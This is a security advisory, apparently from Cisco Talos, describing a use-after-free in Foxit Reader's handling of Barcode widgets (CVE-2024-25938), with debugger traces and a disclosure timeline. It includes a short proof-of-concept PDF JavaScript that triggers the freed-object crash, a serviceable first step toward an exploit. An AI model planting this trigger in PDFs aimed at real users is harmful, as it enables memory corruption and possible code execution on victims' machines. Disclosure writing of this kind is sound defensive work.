CVE-2024-25938
A use-after-free vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Barcode widget. A specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2024.1.0.23997
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a Barcode object. This can be illustrated by the following proof-of-concept code:
function main() {
getField('Barcode Field0').setAction("Calculate",'delete_pages();');
app.activeDocs[0].getField('Barcode Field0').buttonSetIcon( );
}
function delete_pages() {
app.activeDocs[0].deletePages();
app.activeDocs[0].deletePages();
}
The above code simply assigns a callback function to the Barcode Calculate for the field Barcode Field0, which is promptly triggered by the second call to getField . In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when a Barcode object is freed by deletePages() and is used without any validation. We can observe the following in the debugger (with PageHeap enabled):
0:000> g
eax=072fe130 ebx=072fe19c ecx=029940a0 edx=00000002 esi=12f4cb88 edi=12f4cb48
eip=02cd56e9 esp=072fe108 ebp=072fe148 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x11f9270 (029940a0)}
0:000> g
eax=00d7f9a0 ebx=072fe19c ecx=12f53500 edx=046b9308 esi=12f4cb88 edi=12f4cb48
eip=029bbb4d esp=072fdea4 ebp=072fdf4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x1220d1d:
029bbb4d ffd0 call eax {FoxitPDFReader!CryptUIWizExport+0x36b20 (00d7f9a0)}
0:000> g
in javascript::Field::UpdateFormField
eax=00d7f9a0 ebx=072fe19c ecx=12f53500 edx=046b9308 esi=12f4cb88 edi=12f4cb48
eip=029bbb4d esp=072fdea4 ebp=072fdf4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x1220d1d:
029bbb4d ffd0 call eax {FoxitPDFReader!CryptUIWizExport+0x36b20 (00d7f9a0)}
0:000> g
eax=072fd698 ebx=072fd704 ecx=02904f80 edx=00000002 esi=1029b318 edi=12ff2a58
eip=02cd56e9 esp=072fd670 ebp=072fd6b0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ; <------ (1)
0:000> g
ModLoad: 695d0000 69927000 C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
eax=072fd698 ebx=072fd704 ecx=02904f80 edx=00000002 esi=10b39840 edi=10b39800
eip=02cd56e9 esp=072fd670 ebp=072fd6b0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ; <------ (2)
0:000> g
eax=072fafa8 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0
eip=005aad36 esp=072fafcc ebp=072fd3f4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb886:
005aad36 8b01 mov eax,dword ptr [ecx] ds:002b:132fe9b0=0472e794
0:000> dd ecx ;<--------------- (3)
132fe9b0 0472e794 132fea50 186d2520 12d6c488
132fe9c0 e0e0e000 00000001 10b9c9e8 01000101
132fe9d0 00000004 00000000 132fea90 00000000
132fe9e0 10b9c944 135b0a40 0f5fd160 00000001
132fe9f0 00000000 00000000 00000000 00000000
132fea00 00000000 e0e0e001 00000000 12f53500
132fea10 00000000 a0a0a0a0 a0a0a0a0 f0f0f0f0
132fea20 00000000 00000000 86981040 10770152
0:000> p
eax=0472e794 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0
eip=005aad38 esp=072fafcc ebp=072fd3f4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb888:
005aad38 6a01 push 1
0:000> p
eax=0472e794 ebx=132feb6c ecx=132fe9b0 edx=07111000 esi=132feb68 edi=12fdb7b0
eip=005aad3a esp=072fafc8 ebp=072fd3f4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88a:
005aad3a ff5004 call dword ptr [eax+4] ds:002b:0472e798=0174e360 ; <------ (4)
0:000> p
eax=132fe9b0 ebx=132feb6c ecx=132fe9b0 edx=00000001 esi=132feb68 edi=12fdb7b0
eip=005aad3d esp=072fafcc ebp=072fd3f4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88d:
005aad3d 83c604 add esi,4
0:000> dd ecx ; <------ (5)
132fe9b0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9c0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9d0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9e0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fe9f0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fea00 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
132fea10 f0f0f0f0 a0a0a0a0 a0a0a0a0 f0f0f0f0
132fea20 00000000 00000000 86981040 10770152
At [1] and [2] above, the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. The second call to the deletePages_static() method calls the destructor method of the CBF_Widget class at [4]. This destructor call frees the vulnerable CBF_Widgetobject. The value of the vulnerable CBF_Widget object is examined at [3] and [5]. It shows the value before and after the destructor method is called. The vulnerable CBF_Widget object is a type of Barcode object, which is later used without any validation. This can be observed in a debugger at the time of the crash:
0:000> g
eax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=135b0a40 edi=0472e16c
eip=0174914c esp=072fde24 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4ffe9c:
0174914c c20800 ret 8
0:000> t
eax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=135b0a40 edi=0472e16c
eip=01758f54 esp=072fde30 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fca4:
01758f54 8b7334 mov esi,dword ptr [ebx+34h] ds:002b:132fe9e4=f0f0f0f0
0:000> p
eax=ffffffff ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f57 esp=072fde30 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fca7:
01758f57 8d4350 lea eax,[ebx+50h]
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f5a esp=072fde30 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcaa:
01758f5a 50 push eax
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f5b esp=072fde2c ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcab:
01758f5b ff7510 push dword ptr [ebp+10h] ss:002b:072fde90=00000001
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=3d29bcf1 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f5e esp=072fde28 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcae:
01758f5e 8bcb mov ecx,ebx
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f60 esp=072fde28 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb0:
01758f60 c70000000000 mov dword ptr [eax],0 ds:002b:132fea00=f0f0f0f0
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f66 esp=072fde28 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb6:
01758f66 ff75e8 push dword ptr [ebp-18h] ss:002b:072fde68=186ce020
0:000> p
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=01758f69 esp=072fde24 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50fcb9:
01758f69 e8920546ff call FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf0 (00bb9500) <----- (6)
0:000> t
eax=132fea00 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9500 esp=072fde20 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf0:
00bb9500 8b410c mov eax,dword ptr [ecx+0Ch] ds:002b:132fe9bc=f0f0f0f0 ; <--------------- (7)
0:000> p
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9503 esp=072fde20 ebp=072fde80 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200247
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf3:
00bb9503 85c0 test eax,eax
0:000> p
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9505 esp=072fde20 ebp=072fde80 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf5:
00bb9505 7403 je FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddfa (00bb950a) [br=0]
0:000> p
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9507 esp=072fde20 ebp=072fde80 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:
00bb9507 8b00 mov eax,dword ptr [eax] ds:002b:f0f0f0f0=???????? ; <--------------- (8)
0:000> p
(167c.41c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=f0f0f0f0 ebx=132fe9b0 ecx=132fe9b0 edx=07111000 esi=f0f0f0f0 edi=0472e16c
eip=00bb9507 esp=072fde20 ebp=072fde80 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210286
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:
00bb9507 8b00 mov eax,dword ptr [eax] ds:002b:f0f0f0f0=????????
0:000> u
FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7:
00bb9507 8b00 mov eax,dword ptr [eax]
00bb9509 c3 ret
00bb950a 33c0 xor eax,eax
00bb950c c3 ret
00bb950d cc int 3
00bb950e cc int 3
00bb950f cc int 3
00bb9510 51 push ecx
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fde80 01758785 00000000 00000000 00000001 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2cddf7
01 072fde9c 029bbb4f 00000000 00000000 00000001 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50f4d5
02 072fdf4c 029c3b3c 13055370 186ce110 00000000 FoxitPDFReader!safe_vsnprintf+0x1220d1f
03 072fe060 02994349 12f4cb48 072fe128 072fe0a8 FoxitPDFReader!safe_vsnprintf+0x1228d0c
04 072fe100 02cd56eb 12f4cb48 072fe130 072fe128 FoxitPDFReader!safe_vsnprintf+0x11f9519
05 072fe148 02eb9a6b 131bed70 18dad269 131bed70 FoxitPDFReader!FXJSE_GetClass+0x26b
06 072fe1b0 02eb922e 072fe1f8 18dad269 072fe2d4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cab
07 072fe244 02eb94e5 072fe274 131bed70 072fe2d4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e346e
08 072fe28c 02eb936b 072fe2a4 00000007 072fe2e8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3725
09 072fe2a8 030db17b 00000007 072fe2e8 131bed70 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35ab
0a 072fe2c8 030771d9 00082339 18dadb6d 0000000e FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
0b 072fe310 030771d9 18dbeb6d 18f51dc9 18f51e1d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0c 072fe33c 03075860 18dbeb6d 000821b1 18f51dc9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0d 072fe354 03075689 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
0e 072fe380 02d11f4e 131bed70 00082339 18f51dc9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
0f 072fe490 02d11a42 072fe624 131bed70 072fe4ec FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
10 072fe518 02cfa744 072fe624 131bed70 15a824c4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
11 072fe6c8 02cfa240 072fe764 15a824ec 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
12 072fe6dc 02cd3c5f 072fe764 15a824ec 3d298585 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
13 072fe754 02cd4596 15a824c4 15a823d0 15a824b0 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
14 072fe790 02878af7 15826350 186b928c 15a823d0 FoxitPDFReader!FXJSE_ExecuteScript+0x86
15 072fe848 0287a129 00000000 072fe8d8 072fe880 FoxitPDFReader!safe_vsnprintf+0x10ddcc7
16 072fe860 00bb20df 072fe8d8 072fe880 3d298a41 FoxitPDFReader!safe_vsnprintf+0x10df2f9
17 072fe890 00bb0fa4 15825e28 00000015 072fe8b8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
18 072fe8d0 00baf9d0 186da020 1315e280 10bf3bc8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
19 072fe924 0049d322 072fe954 1315e280 10bf3bc8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
1a 072fe974 0071901b 00000000 3d299749 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
1b 072ff598 03cb9713 00000000 00000000 3d2994b9 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
1c 072ff668 03cba8ec 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
1d 072ff68c 03cb5292 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
1e 072ff700 03cb5b05 13076098 000d02c2 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
1f 072ff720 750c120b 000d02c2 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
20 072ff74c 750b81ca 03cb5ad1 000d02c2 00000429 USER32!AddClipboardFormatListener+0x4b
21 072ff830 750b5f2a 03cb5ad1 00000000 00000429 USER32!GetClassLongW+0x7ba
22 072ff8a4 750b5cf0 00000329 072ff8cc 0069f324 USER32!DispatchMessageW+0x24a
23 072ff8b0 0069f324 0c3c8fe8 0c3c8fe8 057d98e8 USER32!DispatchMessageW+0x10
24 072ff8cc 0069f3e3 057d98e8 0069f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
25 072ff8ec 040e29c2 00000000 0580550c 0710e000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
26 072ff904 03e9cef1 00250000 00000000 0c3653c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
27 072ff950 76ddfcc9 0710e000 76ddfcb0 072ff9bc FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
28 072ff960 77247c6e 0710e000 8017ce93 00000000 KERNEL32!BaseThreadInitThunk+0x19
29 072ff9bc 77247c3e ffffffff 77268c33 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0x11e
2a 072ff9cc 00000000 03e9cfc0 0710e000 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xee
At [6] above, the vulnerable CBF_Widget object calls the CBA_Annot::GetPage method. In CBA_Annot::GetPage(), the vulnerable freed CBF_Widget object is dereferenced at [7]. This directly leads to a use-after-free condition and results in a crash. Depending on the memory layout of the process, it may be possible to do arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
The vendor has provided updated versions
2024-04-01 - Vendor Disclosure
2024-04-28 - Vendor Patch Release
2024-04-30 - Public Release
Discovered by KPC of Cisco Talos.